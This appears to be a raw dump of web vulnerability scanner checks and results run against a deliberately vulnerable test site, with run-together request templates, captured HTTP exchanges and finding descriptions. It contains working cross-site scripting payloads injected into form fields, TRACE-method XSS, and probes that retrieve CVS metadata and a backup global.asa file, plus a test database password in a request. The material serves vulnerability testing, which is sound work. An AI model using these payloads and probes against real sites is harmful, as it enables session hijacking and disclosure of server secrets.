<P>The <b>hidden</b> parameter "dbConnectString" = >"><script>alert("XSS")</script></P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Double Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the single quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp.bak
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=<attack>>"><script>alert("XSS")</script></attack>&txtFirstName=Joe&txtLastName=Swinney<script>alert\("XSS"\)<\/script>GET /CVS/Entries HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:34:11 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 07 Jan 2002 20:34:28 GMT
ETag: "ccb36ab4ba97c11:8f6"
Content-Length: 1723
D/aolcom////
D/aolhome////
D/arribada////
D/au////
D/automotive////
D/buy////
D/Canada////
D/cdnow////
D/chinatown////
D/community////
D/cshome////
D/dchome////
D/fre////
D/gc////
D/ger////
D/givingguide////
D/help////
D/hollywood////
D/homepages////
D/icqhome////
D/included////
D/jp////
D/jpn////
D/la////
D/nchome////
D/powersellers////
D/redir////
D/regional////
D/search////
D/sell////
D/services////
D/spa////
D/support////
D/syipreview////
D/travolta////
D/UK////
D/unavailable////
D/US////
D/valvoline////
/coming-soon.html/1.3.2.3/Wed Aug 04 00:16:58 1999//Tcurrent
/empl-agreement.html/1.2.2.4/Wed Dec 01 23:06:12 1999//Tcurrent
/eq-verified-user-welcome.html/1.2.2.4/Wed Dec 01 23:06:13 1999//Tcurrent
/footer.html/1.1.2.7/Wed Mar 15 22:03:43 2000//Tcurrent
/header.html/1.3.2.12/Sun Feb 06 15:35:06 2000//Tcurrent
/itemview-link.html/1.2.2.4/Wed Mar 15 22:03:43 2000//Tcurrent
/jpbridge.html/1.1.2.2/Fri Feb 18 02:58:11 2000//Tcurrent
/outage-letter.html/1.1.2.6/Sun Feb 06 15:35:07 2000//Tcurrent
/pagetype.html/1.2/Tue Jun 08 18:34:21 1999//Tcurrent
/pay-coupon.html/1.1.2.2/Wed Dec 01 23:06:14 1999//Tcurrent
/powersellers.html/1.1.2.8/Wed Dec 01 23:06:14 1999//Tcurrent
/preview.html/1.1.2.5/Fri Mar 03 03:09:55 2000//Tcurrent
/stats.html/1.1.2.3/Wed Aug 04 00:17:00 1999//Tcurrent
/viewitem_bidbox.html/1.1.2.7/Wed Mar 15 22:03:44 2000//Tcurrent
/viewitem_end.html/1.1.2.6/Wed Mar 15 22:03:44 2000//Tcurrent
/welcome-july.html/1.1.2.1/Tue Aug 10 17:37:18 1999//Tcurrent
/welcome-new.html/1.3.2.12/Wed Aug 04 00:17:00 1999//Tcurrent
/welcome.html/1.1.2.13/Fri Oct 22 17:05:18 1999//Tcurrent
/sitemap.html/1.3.2.63/Mon Mar 27 18:55:48 2000//Tcurrent
CVS Content FilesA common mistake by administrators or developers is to leave the CVS directory as a subdirectory on many of the folders in the web server. Information contained within that directory (such as usernames, filenames, path root and ip addresses) could be recovered by an attacker and used for malicious purposes.GET /<attack>CVS/Entries</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
2\d\d |40[1]TRACE /<script>alert('TRACE');</script> HTTP/1.1
Host: zero.webappsecurity.com
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 17:01:05 GMT
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 83
TRACE /<script>alert('TRACE');</script> HTTP/1.1
Host: zero.webappsecurity.com
HTTP TRACE Method Cross-Site ScriptingThe TRACE method is enabled on the webserver. TRACE is a part of the HTTP specification that is intended to be used for debugging and testing purposes. A TRACE request will generate a response containing the text of the original response. Under certain circumstances, an attacker can use the TRACE method's functionality to launch a variant of cross-site scripting attacks against web clients. This can only occur if an attacker can force a web client into executing arbitrary HTTP requests (usually through ActiveX) and the web client also contains weak cross-domain policy enforcement.TRACE <var name="path"/> <var name="protocol"/>
Host: <var name="host"/>
GET /global.asa.bak HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:33:03 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:17 GMT
ETag: "60cb72c0a8dc11:8f6"
Content-Length: 241
<SCRIPT LANGUAGE=VBScript RUNAT=Server>
Sub Session_OnStart
Session("WildCard") = "%"
End Sub
sub Application_OnStart ' Runs once when the first page of your
application is run for the first time by any user
end sub
</SCRIPT>IIS Global Server Variables Disclosure (global.asa.bak)The global.asa file was retrieved from the webserver due to the file having a backup extension. <BR><BR>
The global.asa file is typically used to define application- or session-level variables that a user or users will use throughout their web session. It commonly contains passwords the system will use to gain access to a database and other system critical information. Inside the global.asa file, you will commonly find ODBC Data Source Name definitions that all ASP pages on the site will use. Type is especially dangerous because it will frequently expose a database server name, database name, user name and database password. <BR><BR>Normally the webserver denies any request to the global.asa file, but if the file has a different extension (global.asa.old, global.bac, etc.), then the webserver will return the full source of the global.asa file to the attacker.GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
SubPOST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 175
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=>"'><img%20src="javascript:alert('XSS')">&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:57:01 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 388
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = >"'><img src="javascript:alert('XSS')"></P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible IMG-Tag Embedded Javascript Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place by embedding potentially malicious JavaScript code using an IMG tag with a specific JavaScript link as its source. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp.bak
Content-Length: 175
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=<attack>>"'><img%20src="javascript:alert('XSS')"></attack>&txtLastName=Swinneyjavascript:alert\('XSS'\)">GET /join.asp?name=&email=&surname=&house=&street=&address2=test@<script>alert(document.cookie)</script>.com&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:38 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4022
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Parameter-Based Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This cross-site scripting attack takes place because some web applications embed user input in JavaScript string literals.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "<script>alert(document.cookie)</script>" . If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=<attack>test@<script>alert(document.cookie)</script>.com</attack>&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
test@<script>alert\(document\.cookie\)GET /join.asp?name=&email=&surname=&house=--><script>alert('XSS')</script>&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:42 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Comment Injection Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place due to the fact that some web applications embed user input in the HTML comments. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=<attack>--><script>alert('XSS')</script></attack>&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
--><script>alert\('XSS'\)<\/script>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=>"><script>alert('XSS')</script>&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Single Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the double quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=<attack>>"><script>alert('XSS')</script></attack>&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)<\/script>GET /join.asp?name=&email=&surname=>"><script>alert("XSS")</script>&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
